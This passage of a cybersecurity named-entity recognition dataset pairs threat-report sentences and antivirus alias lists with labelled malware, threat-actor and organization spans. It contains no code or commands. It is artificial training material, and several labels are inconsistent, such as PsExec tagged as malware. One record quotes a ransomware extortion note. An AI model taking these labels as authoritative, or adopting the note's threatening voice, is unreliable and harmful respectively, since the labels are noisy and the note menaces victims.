Trojan.Win32.Small.cusdaj Backdoor.W32.Small!c Trojan[Backdoor]/Win32.Small HackTool:Win32/Dlhs.B Backdoor.Win32.Small.liq Trj/Ziyang.A Backdoor.Win32.Small W32/BackDoor.A!tr Win32/Backdoor.d0c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003407", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Uztuby.5 Script.Trojan.Malautoit.E Trojan.Uztuby.5 Trojan.Uztuby.5 Trojan.Uztuby.5 W32/ObfusInjectBot.a Zum.Ciusky.3 Trojan/Win32.Zbot.C311341 Trojan.Uztuby.5 W32/MalitRar.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_003408", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Small.xpm TrojanDownloader:Win32/Sagnusnagta.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003410", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanAPT.Infostealer.H4 Win32.Trojan.WisdomEyes.16070401.9500.9983 Trojan.Win32.ke3chang.f TrojWare.Win32.PSW.Delf.~JHN Trojan.DownLoader9.45552 BehavesLike.Win32.BadFile.gz Trojan.Win32.ke3chang.f Trojan/Win32.Infostealer.R91040", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003411", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/AutoRun.dqkk TROJ_SPNR.35CC13 Worm.Autorun-6695 Worm.Win32.AutoRun.eemt Trojan.Win32.Cromptui.bbwocj Worm.Win32.A.AutoRun.32768.Y[h] PE:Worm.VBInjectEx!1.99E6[F1] Trojan.DownLoader4.54145 TROJ_SPNR.35CC13 BehavesLike.Win32.Dropper.nm W32/Trojan.MOJM-1187 Worm/AutoRun.aboz TR/Spy.100048 Trojan.Heur.EF62DD Trojan/Win32.HDC TrojanDownloader:Win32/Kimiki.A Worm.AutoRun Win32.Worm.Autorun.Edef Trojan-Downloader.Win32.Kimiki Worm.Win32.AutoRun.eemt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003412", "source": "cyner2_train"}} {"text": "In one case, the content of the email appeared to be a legitimate email conversation between several employees, even containing contact details of employees from several banks.", "spans": {}, "info": {"id": "cyner2_train_003413", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.QueryexXM.Worm HackTool.Wpakill HackTool.WpaKill W32/Risk.JBSX-2163 Trojan.ADH.2 Win.Trojan.Swrort-5988 Crack-WindowsWGA.a HackTool.Win32.Wpakill W32/MalwareF.XIWY Trojan/Win32.Buzus HackTool:MSIL/Wpakill.A Crack-WindowsWGA.a HackTool.Wpakill!EXR6p6S0Jr0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003415", "source": "cyner2_train"}} {"text": "Xavier's impact has been widespread.", "spans": {}, "info": {"id": 
"cyner2_train_003417", "source": "cyner2_train"}} {"text": "But I know your email for sure it's not that one.", "spans": {}, "info": {"id": "cyner2_train_003420", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Raleka.14880.C Worm.Raleka.e.n3 W32/Raleka.worm Worm.Raleka.Win32.17 W32/Raleka.worm Worm.Raleka!sd8qYJWRVVk W32/Raleka.E W32.HLLW.Raleka Raleka.E Win32/Raleka.D Net-Worm.Win32.Raleka.e Trojan.Win32.Raleka.enog Worm.Win32.Raleka.H BehavesLike.Win32.Downloader.lc W32/Raleka.RXXM-3755 Worm/Raleka.k Worm/Raleka.E.2 Worm[Net]/Win32.Raleka Worm.Raleka.e.kcloud Worm:Win32/Raleka.G Trojan/Win32.Downloader Worm.Raleka W32/Kelar.B Win32/Raleka.H Win32.Worm-net.Raleka.Egog Net-Worm.Win32.Raleka.e W32/Raleka.B!worm Worm/Raleka.D Worm.Win32.Raleka.aTW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003421", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Trojan/ArchSMS.hqni TROJ_FAKEALERT_CD1031EC.RDXN Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Tnega.BTJDDdC TROJ_FAKEALERT_CD1031EC.RDXN Trojan.Win32.SMSSend.bddqwl Trojan.SMSSend.517 Tool.ArchSMS.Win32.277 Hoax.Win32.ArchSMS Hoax.ArchSMS.mn HackTool[Hoax]/Win32.ArchSMS Win32.Troj.Hoax.kcloud Trojan:Win32/Ninunarch.A Trojan/Win32.ArchSMS.R68018 Hoax.ArchSMS.hq Win32/Hoax.ArchSMS.JS Trojan.ArchSMS!V0Eag+i949w", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003422", "source": "cyner2_train"}} {"text": "Spora got some hype of being a ransomware that can encrypt files offline.", "spans": {"MALWARE: Spora": [[0, 5]], "MALWARE: a ransomware": [[29, 41]]}, "info": {"id": "cyner2_train_003423", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan-Downloader.Win32.Sysdrop.lm Trojan.Win32.Sysdrop.esnrws Downloader.Sysdrop.Win32.33 TR/Zusy.ugkcf Trojan.Zusy.D3C19C Trojan-Downloader.Win32.Sysdrop.lm Downloader/Win32.Sysdrop.C2035975 TrojanDownloader.Sysdrop 
Trj/GdSda.A Trojan.DL.Sysdrop! Trojan-Downloader.Win32.Sysdrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003426", "source": "cyner2_train"}} {"text": "Herein we release our analysis of a previously undocumented backdoor that has been targetedagainst embassies and consulates around the world leads us to attribute it, with high confidence,to the Turla group.", "spans": {"MALWARE: backdoor": [[60, 68]], "ORGANIZATION: embassies": [[99, 108]], "ORGANIZATION: consulates": [[113, 123]], "THREAT_ACTOR: the Turla group.": [[191, 207]]}, "info": {"id": "cyner2_train_003427", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Tiny.S40745 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Tiny.elmbme MalCrypt.Indus! BehavesLike.Win32.Backdoor.zz TR/Tiny.lsfum Trojan.Zusy.D32039 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003428", "source": "cyner2_train"}} {"text": "Turla is a notorious group that has been targeting governments, government officials and diplomats for years.", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "THREAT_ACTOR: group": [[21, 26]], "ORGANIZATION: governments, government officials": [[51, 84]], "ORGANIZATION: diplomats": [[89, 98]]}, "info": {"id": "cyner2_train_003429", "source": "cyner2_train"}} {"text": "TrendMicro first discovered MalumPoS, a new attack tool that threat actors can reconfigure to breach any PoS system they wish to target.", "spans": {"ORGANIZATION: TrendMicro": [[0, 10]], "MALWARE: MalumPoS,": [[28, 37]], "MALWARE: attack tool": [[44, 55]], "SYSTEM: PoS system": [[105, 115]]}, "info": {"id": "cyner2_train_003430", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.Seftad!O Trojan.Seftad Trojan.MBRlock.Win32.1 Trojan/Seftad.a Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Risk.HXYU-7341 Trojan.Bootlock Win32/RansomSeftad.A Trojan-Ransom.Win32.Seftad.a Trojan.Win32.Seftad.bsiwp Troj.Ransom.W32.Seftad.tn9Q 
Trojan.MBRlock.1 Trojan-Ransom.Win32.Seftad W32/MalwareF.RQPA Trojan/Seftad.a BOO/Seftad.A Trojan[Ransom]/Win32.Seftad Trojan:Win32/Seftad.A Trojan-Ransom.Win32.Seftad.a Trojan/Win32.Seftad.R111206 Trojan-Ransom.Seftad Win32/MBRlock.A Trojan.Seftad!+WmSfnLYKGo W32/Seftad.A!tr Trj/SeftadMBR.A.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003431", "source": "cyner2_train"}} {"text": "Unknown threats may evade signature-based detection, but can be blocked by other detection tools which identify malicious behavior.", "spans": {"MALWARE: Unknown threats": [[0, 15]], "MALWARE: malicious behavior.": [[112, 131]]}, "info": {"id": "cyner2_train_003432", "source": "cyner2_train"}} {"text": "Regin is a multi-purpose data collection tool which dates back several years.", "spans": {"MALWARE: Regin": [[0, 5]]}, "info": {"id": "cyner2_train_003433", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod4c3.Trojan.53a7 Win32.P2P.Mua.E@mm Win32.P2P.Mua.E@mm Worm.Mua.Win32.3 W32/Mua.e Worm.P2P.Mua!6PD7raLqpvw W32.HLLW.Mua Win32/Mua.B BKDR_BRABOT.B P2P-Worm.Win32.Mua.e Win32.P2P.Mua.E@mm Trojan.Win32.Mua.hfob Worm.Win32.A.P2P-Mua.15147 Win32.P2P.Mua.E@mm Win32.P2P.Mua.E@mm BKDR_BRABOT.B BehavesLike.Win32.Sality.lh W32/Risk.FPWU-1321 Worm[P2P]/Win32.Mua Worm.Mua.e.kcloud Worm:Win32/Mua.C Win32.P2P.Mua.E@mm Win32/Mua.worm.15152.C Worm.Mua Worm.Win32.Mua.AhDz Win32/Mua.E Win32.Worm-P2P.Mua.dopm P2P-Worm.Win32.Mua.c W32/Shower.L Worm/Mua.E Win32/Trojan.bfd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003434", "source": "cyner2_train"}} {"text": "I had found very few examples of non-targeted malspam using this RAT.", "spans": {"MALWARE: RAT.": [[65, 69]]}, "info": {"id": "cyner2_train_003435", "source": "cyner2_train"}} {"text": "We recently spotted Neutrino being used to deliver a zero-detection Zeus variant and are sharing some brief indicators here.", "spans": {"MALWARE: Neutrino": [[20, 28]], "MALWARE: 
Zeus variant": [[68, 80]]}, "info": {"id": "cyner2_train_003437", "source": "cyner2_train"}} {"text": "Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file.", "spans": {"MALWARE: Reaver": [[0, 6]], "MALWARE: final payload": [[52, 65]]}, "info": {"id": "cyner2_train_003438", "source": "cyner2_train"}} {"text": "The Turla group is known to target government, military, technology, energy and commercial organisations.", "spans": {"THREAT_ACTOR: The Turla group": [[0, 15]], "ORGANIZATION: government, military, technology, energy": [[35, 75]], "ORGANIZATION: commercial organisations.": [[80, 105]]}, "info": {"id": "cyner2_train_003439", "source": "cyner2_train"}} {"text": "This report aims to uncover at least some undertakings of that group and to connect different attacks across the globe.", "spans": {"THREAT_ACTOR: group": [[63, 68]]}, "info": {"id": "cyner2_train_003440", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Adware.RuKomaCRTD.Win32.4797 PUP.LoadMoney/Variant Trojan.Adware.Rukometa.Mikey.8 HT_RUKOMA_GA2700D5.UVPM HT_RUKOMA_GA2700D5.UVPM Trojan.Win32.Dwn.ehjpxo Trojan.DownLoader22.51269 Trojan.Scar.hqw Adware/Win32.Updater.C1575400 Adware.Zusy PUA.RuKoma! 
PUA.RuKoma", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003441", "source": "cyner2_train"}} {"text": "In February 2016, Check Point researchers first discovered HummingBad, a malware that establishes a persistent rootkit on Android devices, generates fraudulent ad revenue, and installs additional fraudulent apps.", "spans": {"ORGANIZATION: Check Point researchers": [[18, 41]], "MALWARE: HummingBad,": [[59, 70]], "MALWARE: malware": [[73, 80]], "MALWARE: rootkit": [[111, 118]], "SYSTEM: Android devices,": [[122, 138]]}, "info": {"id": "cyner2_train_003442", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Winsecsrv Trojan.Winsecsrv.Win64.325 Trojan.Win64.Winsecsrv TR/Winsecsrv.imeno Trojan:Win64/Winsecsrv.B!bit Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003444", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Yakes.303104 Trojan.Win32.Yakes!O Ransom.Tobfy.S5080 Trojan.Yakes.Win32.7333 Trojan/Yakes.bitd Trojan.Symmi.D1319B Win32.Trojan.VB.kf Trojan.Ransomlock.K Ransom_TOBFY.SM Win.Trojan.Yakes-628 Trojan.Win32.Yakes.bitd Trojan.Win32.Yakes.cojazo TrojWare.Win32.Injector.XFR Ransom_TOBFY.SM BehavesLike.Win32.PWSZbot.dt Trojan/Yakes.kjh Trojan/Win32.Yakes Trojan.Win32.A.Yakes.303104.D Trojan.Win32.Yakes.bitd Trojan/Win32.VBKrypt.R40134 Trojan.Yakes Trojan.Injector Win32/VB.QMS Trojan.Win32.Tobfy W32/Injector.YWH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003447", "source": "cyner2_train"}} {"text": "The malicious attachment, which offered salacious spoilers and video clips, attempted to install a 9002 remote access Trojan RAT historically used by state-sponsored actors.", "spans": {"MALWARE: a 9002 remote access Trojan RAT": [[97, 128]], "THREAT_ACTOR: state-sponsored actors.": [[150, 173]]}, "info": {"id": "cyner2_train_003449", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Barys.DD949 
Win32.Trojan.WisdomEyes.16070401.9500.9860 Trojan:Win32/Grenam.B!inf Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003450", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Malware.1 Trojan.Rootkit.GGA Backdoor:W32/PcClient.ALE BACKDOOR.Trojan Backdoor:Win32/Xinia.C Trojan.Rootkit.GGA RootKit.Win32.Undef.ru W32/Rootkit.A SHeur.CPFS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003451", "source": "cyner2_train"}} {"text": "Hancitor also known as Tordal and Chanitor and Ruckguv have reappeared in campaigns distributing Pony and Vawtrak with significant updates and increased functionality.", "spans": {"MALWARE: Hancitor": [[0, 8]], "MALWARE: Tordal": [[23, 29]], "MALWARE: Chanitor": [[34, 42]], "MALWARE: Ruckguv": [[47, 54]], "THREAT_ACTOR: campaigns": [[74, 83]], "MALWARE: Pony": [[97, 101]], "MALWARE: Vawtrak": [[106, 113]]}, "info": {"id": "cyner2_train_003452", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Flooder.MSN.Chiller.A Trojan/W32.Flooder.135168.E Trojan.Flooder.MSN.Chiller.A Tool.Chiller.Win32.1 Trojan.Flooder.MSN.Chiller.A Flooder.Chiller!cPnYwu6r4qI Win32/Flooder.MSN.Chiller.10 TROJ_MSN.CHILLER IM-Flooder.Win32.Chiller Trojan.Win32.Chiller.ddka IM-Flooder.W32.Chiller!c Trojan.Flooder.MSN.Chiller.A TrojWare.Win32.Flooder.MSN.10 Trojan.Flooder.MSN.Chiller.A FDOS.Children TROJ_MSN.CHILLER W32/Risk.BSWW-2789 Flooder.MSN.Chiller HackTool[Flooder]/Win32.Chiller Trojan.Flooder.MSN.Chiller.A IMFlooder.Chiller Flooder.MSN.Chiller IM-Flooder.Win32.Chiller Trojan.Flooder.MSN.Chiller.A Flooder.AZF Trojan.Win32.IMFlooder.aa Win32/Trojan.Flooder.cc8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003454", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R VBA.Trojan.Obfuscated.at VBA/Obfuscated.P Doc.Macro.Obfuscation-6360615-0 VB:Trojan.VBA.Downloader.R 
VB:Trojan.VBA.Downloader.R Trojan.Script.MLW.ehjqnz VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R W97M/Downloader.bkw HEUR.VBA.Trojan.e TrojanDownloader:O97M/Shelmock.A!dha W97M/Downloader.bkw Trojan.VBA.Obfuscated heur.macro.powershell.x", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003455", "source": "cyner2_train"}} {"text": "This relatively new technique makes it difficult to detect the malware—especially on behavior-based malware detection systems.", "spans": {"SYSTEM: behavior-based malware detection systems.": [[85, 126]]}, "info": {"id": "cyner2_train_003456", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mehm.B Trojan/W32.CGIScan.333312 Aplicacion/CGIScan.40 Trojan.Mehm.B Trojan.Cgiscan!ODpuR5Z5bgo W32/HackTool.CNH Hacktool.Flooder Win.Trojan.Cgiscan not-a-virus:NetTool.Win32.CGIScan.40 Riskware.Win32.CGIScan.byaea NetTool.CGIScan.333312[h] Trojan.Mehm.B Trojan.Mehm.B Trojan.DownLoader.9414 Tool.CGIScan.Win32.1 W32/Tool.MGCU-4799 TR/Mehm.B W32/Cgiscan.A!tr Trojan.Mehm.B Win-Trojan/Mehm.333312 Trojan:Win32/Cgiscan.A Trojan.Mehm.B Hacktool.Win32.CGIScan.40 Win32.Trojan.Spnr.Wqmq not-a-virus:NetTool.Win32.CGIScan Trojan.Mehm.B HackTool/CgiScan.A Win32/Virus.NetTool.902", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003457", "source": "cyner2_train"}} {"text": "We will refer to the gang behind the malware as TeleBots.", "spans": {"THREAT_ACTOR: gang": [[21, 25]], "MALWARE: malware": [[37, 44]], "THREAT_ACTOR: TeleBots.": [[48, 57]]}, "info": {"id": "cyner2_train_003458", "source": "cyner2_train"}} {"text": "They then distribute the trojanized application using their own, Russian-language-targeted Android Application sites.", "spans": {"MALWARE: trojanized application": [[25, 47]]}, "info": {"id": "cyner2_train_003459", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanpws.Qqpass.20916 Trojan.Adware.Graftor.D9426 Win32.Trojan.WisdomEyes.16070401.9500.9999 
Infostealer.Onlinegame TSPY_ONLINEG.JW Win.Spyware.28080-1 Trojan-GameThief.Win32.OnLineGames.akyyi Trojan.Win32.Nilage.bstxe Trojan.PWS.Gamania.8978 TSPY_ONLINEG.JW BehavesLike.Win32.RAHack.dc Trojan/PSW.OnLineGames.xyc Trojan[GameThief]/Win32.WOW.gic Trojan:Win32/Ordpea.A Trojan-GameThief.Win32.OnLineGames.akyyi MalwareScope.Trojan-PSW.Game.7 Trj/Lineage.HKT Trojan.Win32.OnlineGames.pjf Trojan.PWS.OnlineGames.GFA Trojan-GameThief.Win32.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003460", "source": "cyner2_train"}} {"text": "We observed several high-volume FormBook malware distribution campaigns primarily taking aim at Aerospace, Defense Contractor, and Manufacturing sectors within the U.S. and South Korea during the past few months.", "spans": {"MALWARE: FormBook malware": [[32, 48]], "THREAT_ACTOR: distribution campaigns": [[49, 71]], "ORGANIZATION: Aerospace, Defense Contractor,": [[96, 126]], "ORGANIZATION: Manufacturing sectors": [[131, 152]]}, "info": {"id": "cyner2_train_003461", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanspy.Coinsteal TROJ_GE.0352184D Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_GE.0352184D Trojan.MSIL.PSW TrojanSpy:MSIL/CoinSteal.B!bit Spyware/Win32.Quasar.C2001029 Trojan.FakeMS Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003463", "source": "cyner2_train"}} {"text": "This post opens the lock up and takes a look inside.", "spans": {}, "info": {"id": "cyner2_train_003465", "source": "cyner2_train"}} {"text": "With email subject lines such as, bank account record annual report and company database we believe that attackers are possibly targeting companies.", "spans": {"THREAT_ACTOR: attackers": [[105, 114]], "ORGANIZATION: companies.": [[138, 148]]}, "info": {"id": "cyner2_train_003466", "source": "cyner2_train"}} {"text": "Gary Warners's blog also reported on this and similar campaigns, indicating that a well-known botnet, Kelihos, 
is responsible for distributing this spam.", "spans": {"ORGANIZATION: Gary Warners's blog": [[0, 19]], "THREAT_ACTOR: campaigns,": [[54, 64]], "MALWARE: botnet, Kelihos,": [[94, 110]]}, "info": {"id": "cyner2_train_003468", "source": "cyner2_train"}} {"text": "However, not to be out done, APT attackers have also started leveraging the exploit in targeted spear phishing attacks as well.", "spans": {"THREAT_ACTOR: APT attackers": [[29, 42]], "MALWARE: exploit": [[76, 83]]}, "info": {"id": "cyner2_train_003469", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.1490 Trojan.Heur.RP.E99DCA WORM_FLYSTUDI.B Win32.Trojan.WisdomEyes.16070401.9500.9998 WORM_FLYSTUDI.B Win.Worm.FlyStudio-34 Trojan.MulDrop6.9267 Trojan.Black.Win32.8293 BehavesLike.Win32.Autorun.vc TrojanDropper.Flystud Win32.Trojan.Ecode.Wwel Trojan.Win32.FlyStudio", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003470", "source": "cyner2_train"}} {"text": "n the past, we have seen such occurrences with Magecart threat actors for example in the breach of the Umbro website.", "spans": {"THREAT_ACTOR: Magecart threat actors": [[47, 69]]}, "info": {"id": "cyner2_train_003472", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Maesorn!O Trojan/Maesorn.g Backdoor.Graybird Win.Trojan.OnlineGames-1999 Trojan.Win32.Maesorn.innuf Trojan.Win32.A.Maesorn.563216[ASPack] Trojan.PWS.Panda.980 BehavesLike.Win32.MultiPlug.hc Trojan/Maesorn.a TR/Maesorn.psa Trojan/Win32.Unknown Trojan.Maesorn.1 Trojan:Win32/Maesorn.A Trojan/Win32.Maesorn.C288249 TScope.Malware-Cryptor.SB Win32.Trojan.Maesorn.Lmax Trojan.Maesorn!i+tWu8HStQI Win32/Trojan.227", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003474", "source": "cyner2_train"}} {"text": "WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER ! TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS ! 
WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc… We collect and download all of your personal data .", "spans": {}, "info": {"id": "cyner2_train_003475", "source": "cyner2_train"}} {"text": "Unlike most ransomware, SamSam is not launched via user focused attack vectors, such as phishing campaigns and exploit kits.", "spans": {"MALWARE: ransomware, SamSam": [[12, 30]], "VULNERABILITY: attack vectors,": [[64, 79]], "THREAT_ACTOR: phishing campaigns": [[88, 106]], "MALWARE: exploit kits.": [[111, 124]]}, "info": {"id": "cyner2_train_003478", "source": "cyner2_train"}} {"text": "In April 2017, in collaboration with Clearsky, Palo Alto Networks Unit 42 published an article about our research into targeted attacks in the Middle East.", "spans": {"ORGANIZATION: Clearsky,": [[37, 46]], "ORGANIZATION: Palo Alto Networks Unit 42": [[47, 73]]}, "info": {"id": "cyner2_train_003480", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.85E5 Downloader.Small.Win32.16916 Trojan/Downloader.Small.eqn Win32.Trojan.WisdomEyes.16070401.9500.9998 Win32/Matcash.AQ TROJ_DLOADER.KGM Win.Downloader.12076-1 Trojan-Downloader.Win32.Small.eqn Trojan.Win32.Small.pnkq Trojan.Win32.Downloader.9806 TrojWare.Win32.TrojanDownloader.Small.AP Trojan.DownLoader.26881 TROJ_DLOADER.KGM BehavesLike.Win32.Backdoor.zh TrojanDownloader.Small.cgx Trojan[Downloader]/Win32.Small TrojanDownloader:Win32/Matcash.A Trojan/Win32.Downloader.R162197 Trj/Downloader.PNC Win32.Trojan-downloader.Small.Agut Trojan.DL.Small!SbF3EFAX1gY Trojan-Downloader.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003481", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.3D2A Trojan.Razy.DF5C4 Win32.Trojan.WisdomEyes.16070401.9500.9773 not-a-virus:RiskTool.Win32.Gamehack.zae Trojan.PWS.Banker1.20175 Trojan.Win32.PSW W32/Trojan.WGYB-0329 RiskTool.Gamehack.iw TR/Taranis.2867 not-a-virus:RiskTool.Win32.Gamehack.zae MalwareScope.Trojan-PSW.Game.16 
Riskware.Gamehack! Win32/Trojan.fe9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003483", "source": "cyner2_train"}} {"text": "However, minimal code change to Ploutus-D would greatly expand its ATM vendor targets since Kalignite Platform runs on 40 different ATM vendors in 80 countries.", "spans": {"MALWARE: Ploutus-D": [[32, 41]], "ORGANIZATION: ATM vendor": [[67, 77]], "SYSTEM: Kalignite Platform": [[92, 110]], "SYSTEM: ATM vendors": [[132, 143]]}, "info": {"id": "cyner2_train_003484", "source": "cyner2_train"}} {"text": "A backdoor also known as: Troj.Dropper.Msil!c Trojan.Zusy.D3F4E2 Win32.Trojan.WisdomEyes.16070401.9500.9901 Trojan.Coinbitminer TROJ_COINMINER_HA220058.UVPM Trojan.DownLoader25.65376 Trojan.CoinMiner.Win32.6726 TROJ_COINMINER_HA220058.UVPM Trojan:MSIL/CoinMiner.KA!bit Trojan/Win32.Tiggre.R218036 Misc.Riskware.BitCoinMiner Trj/GdSda.A Trojan.MinerBot Win32/Trojan.Dropper.bc3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003485", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Jiwerks.A8 Trojan/Downloader.Delf.quc Trojan.Graftor.D451A Trojan.Win32.Dwn.wpldc Win32.Worm.Qqshare.crbf TrojWare.Win32.TrojanDownloader.Delf.QUC Trojan.DownLoader6.2772 Trojan-Ransom.Win32.Foreign Trojan/Win32.Unknown TrojanDownloader:Win32/Jiwerks.C Trojan/Win32.Banload.R28382 Trojan.DL.Delf!amQyVfM1aVU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003486", "source": "cyner2_train"}} {"text": "During this time it has managed to avoid scrutiny by the security community.", "spans": {"ORGANIZATION: the security community.": [[53, 76]]}, "info": {"id": "cyner2_train_003488", "source": "cyner2_train"}} {"text": "In separate isolated incidents,we also noticed the deployment of MajikPOS via PsExec, a command-line tool that can be used to remotely execute processes on other systems.", "spans": {"MALWARE: MajikPOS": [[65, 73]], "MALWARE: PsExec,": [[78, 85]], 
"MALWARE: command-line tool": [[88, 105]], "SYSTEM: systems.": [[162, 170]]}, "info": {"id": "cyner2_train_003489", "source": "cyner2_train"}} {"text": "The attacks point to extensive knowledge of the targets' activities, and share infrastructure and tactics with campaigns previously linked to Iranian threat actors.", "spans": {"ORGANIZATION: targets' activities,": [[48, 68]], "SYSTEM: share infrastructure": [[73, 93]], "THREAT_ACTOR: campaigns": [[111, 120]], "THREAT_ACTOR: Iranian threat actors.": [[142, 164]]}, "info": {"id": "cyner2_train_003490", "source": "cyner2_train"}} {"text": "We have observed this team utilizing .cim and .bcl files as attack vectors, both of which file types are used by the CIMPLICITY software.", "spans": {"THREAT_ACTOR: team": [[22, 26]], "SYSTEM: CIMPLICITY software.": [[117, 137]]}, "info": {"id": "cyner2_train_003492", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.FC.1842 W32/Msil.AOXS-4373 TSPY_HPCUBESTLR.SM Win.Packed.Confuser-6042561-0 not-a-virus:PSWTool.Win32.MessengerPass.n Trojan.Win32.Stealer.emdjaa Troj.W32.Jorik.Shakblades.lBRs Packed:MSIL/SmartIL.A Trojan.PWS.Stealer.13008 TSPY_HPCUBESTLR.SM BehavesLike.Win32.CryptDoma.fc HackTool.Win32.BrowserPassview W32/Msil.O TrojanSpy.MSIL.ewm Win32.Troj.Undef.kcloud Trj/CI.A Win32/Trojan.cb4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003493", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.G.Door.C Backdoor/W32.GDoor.334848 Backdoor.G.Door.C BKDR_DOOR.LG W32/Backdoor2.DZPI Backdoor.Trojan BKDR_DOOR.LG Win.Trojan.GGDoor-4 Backdoor.G.Door.C Backdoor.Win32.G_Door.c Backdoor.G.Door.C Trojan.Win32.GDoor.beknpm Backdoor.Win32.G_Door.334848 Backdoor.W32.G_Door.c!c Backdoor.G.Door.C Backdoor.G.Door.C Trojan.MulDrop.141 BehavesLike.Win32.Trojan.fc Backdoor/G_Door.c Backdoor.Win32.G_Door.C W32/Backdoor.VMMA-7325 Backdoor/G_Door.c BDS/G_door.C.17 Trojan[Backdoor]/Win32.G_Door Backdoor:Win32/G_Door.C 
Backdoor.Win32.G_Door.c Backdoor.G.Door.C Backdoor.G_Door Bck/Ggdoor.I Win32/G_Door.C Win32.Backdoor.G_door.Svhk Backdoor.G_Door!JC6xcbYSKHg Win32/Backdoor.b76", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003494", "source": "cyner2_train"}} {"text": "The original version of Nokoyawa ransomware was introduced in February 2022 and written in the C programming language.", "spans": {"MALWARE: Nokoyawa ransomware": [[24, 43]], "SYSTEM: the C programming language.": [[91, 118]]}, "info": {"id": "cyner2_train_003495", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.FU.EF8E10 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Risk.CCTW-9250 Trojan.Win32.Jascript.cvmxnk Dropper.Jascript.Win32.59 Trojan-Ransom.Win32.Gimemo W32/MalwareF.OGBH TrojanDropper.Jascript.ao TR/Drop.Jascript.bbo Trojan:Win32/Thetatic.A Dropper/Win32.Xema.C95872 Win32.Trojan-dropper.Jascript.Syrq Trojan.DR.Jascript!LiiZWXoHPPQ W32/Jascript.BBO!tr", "spans": 